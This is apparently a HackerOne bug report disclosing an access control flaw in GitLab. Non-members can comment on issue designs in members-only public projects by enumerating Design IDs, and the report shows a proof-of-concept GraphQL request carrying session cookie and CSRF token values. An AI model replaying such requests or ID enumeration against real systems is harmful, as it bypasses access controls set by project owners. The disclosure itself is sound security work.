Non Project Member of Public Project Can Comment and Reply to Issue Design Even if "Only Project Members" Set for Issues in Settings

HackerOne report #678986 by rafiem on 2019-08-22, assigned to estrike:

Hi Team,

I have found improper access control on issue design in the public project. There is a new feature in issues that enable user to upload design image to spesific issue. Anyone that have read access to the issue then can comment and reply to a design image in the issue. But, in case of Public Projects that set the "Only Project Members" to Issues in settings, non project member still able to comment and reply to spesific design of issue. Because of "Design ID" is incremental and easy to guess, attacker can easily iterate the number of "Design ID" and another case of attack is, previously attacker is member of the projects and he save all the design id of issues on the projects.

Proof of Concept

1.) Incase user A have a public project that enabled "Only Project Members" to the Issues in the settings
2.) In one of the issues, user A upload a design and the design have an ID of "162"
3.) Attacker then can iterate the ID to comment on any issues on public project that enabled "Only Project Members" or attacker previously part of the project member and save the design id
4.) Request perform by attacker :

POST /api/graphql HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 1139  
accept: */*  
Origin: https://gitlab.com  
X-CSRF-Token: qIqkC6CRpfKUXSOqiYaKes6quuFYkkLBEpwZBXG1AzK7zdX50niBVRl/5x7xB6Pb3i786K6OL6vbyI75YxoRgQ==  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36  
content-type: application/json  
Referer: https://gitlab.com/bajigur/cuk1/issues/10/designs/user_wall.png  
Accept-Encoding: gzip, deflate  
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: sidebar_collapsed=false; _biz_uid=ea1b7c6c852741a1b91c529230ca6360; _mkto_trk=id:194-VVC-221&token:_mch-gitlab.com-1561483345548-60566; _ga=GA1.2.1915876956.1561483347; _fbp=fb.1.1561483346763.1551130490; vid=acec44df-0d42-4f26-9ce8-964c785c893f; event_filter=all; _gid=GA1.2.315320630.1566358252; _gitlab_session=88e87632b979666cb39f91edd74bb5bf; _hjid=bbb97822-c8f1-4731-91ad-87c5ab0219dc; _biz_flagsA=%7B%22Version%22%3A1%2C%22XDomain%22%3A%221%22%2C%22Mkto%22%3A%221%22%2C%22Frm%22%3A%221%22%7D; _biz_nA=46; _biz_pendingA=%5B%5D; frequently_used_emojis=thumbsdown

[{"operationName":"createImageDiffNote","variables":{"input":{"noteableId":"gid://gitlab/DesignManagement::Design/162","body":"BRAND NEW MESSAGE !","position":{"headSha":"asd","baseSha":"asd","startSha":"asd","x":1,"y":1,"width":1,"height":100,"paths":{"newPath":"asd"}}}},"query":"mutation createImageDiffNote($input: CreateImageDiffNoteInput!) {\n  createImageDiffNote(input: $input) {\n    note {\n      ...DesignNote\n      discussion {\n        id\n        replyId\n        notes {\n          edges {\n            node {\n              ...DesignNote\n              __typename\n            }\n            __typename\n          }\n          __typename\n        }\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment DesignNote on Note {\n  id\n  author {\n    avatarUrl\n    name\n    username\n    webUrl\n    __typename\n  }\n  body\n  bodyHtml\n  createdAt\n  position {\n    diffRefs {\n      ...DesignDiffRefs\n      __typename\n    }\n    x\n    y\n    height\n    width\n    __typename\n  }\n  __typename\n}\n\nfragment DesignDiffRefs on DiffRefs {\n  baseSha\n  startSha\n  headSha\n  __typename\n}\n"}]  

Note that attacker doesnt need to specify the correct position and newPath of the design, in the example the value is "asd"
5.) Response received :

HTTP/1.1 200 OK  
Server: nginx  
Date: Thu, 22 Aug 2019 00:33:30 GMT  
Content-Type: application/json; charset=utf-8  
Content-Length: 90  
Connection: close  
Access-Control-Allow-Credentials: true  
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS  
Access-Control-Allow-Origin: https://gitlab.com  
Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page  
Access-Control-Max-Age: 1728000  
Cache-Control: max-age=0, private, must-revalidate, no-store  
Etag: W/"124339246668e4ec9bff1f954ae2f02e"  
Pragma: no-cache  
Referrer-Policy: strict-origin-when-cross-origin  
Vary: Origin  
X-Content-Type-Options: nosniff  
X-Download-Options: noopen  
X-Frame-Options: DENY  
X-Permitted-Cross-Domain-Policies: none  
X-Request-Id: yc5uR9G0zP1  
X-Runtime: 0.174266  
X-Ua-Compatible: IE=edge  
X-Xss-Protection: 1; mode=block  
Strict-Transport-Security: max-age=31536000  
Referrer-Policy: strict-origin-when-cross-origin  
RateLimit-Limit: 600  
RateLimit-Observed: 2  
RateLimit-Remaining: 598  
RateLimit-Reset: 1566434070  
RateLimit-ResetTime: Thu, 22 Aug 2019 00:34:30 GMT

[{"data":{"createImageDiffNote":{"note":null,"__typename":"CreateImageDiffNotePayload"}}}]  

6.) User A then check the targeted design and can view the attacker comment on the design issue

<>PoC Video Attached

Impact

Non project members can comment and reply to design in the public projects that enabled "Only Project Members" to Issues

Best Regards,
@rafiem

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• PoC.mp4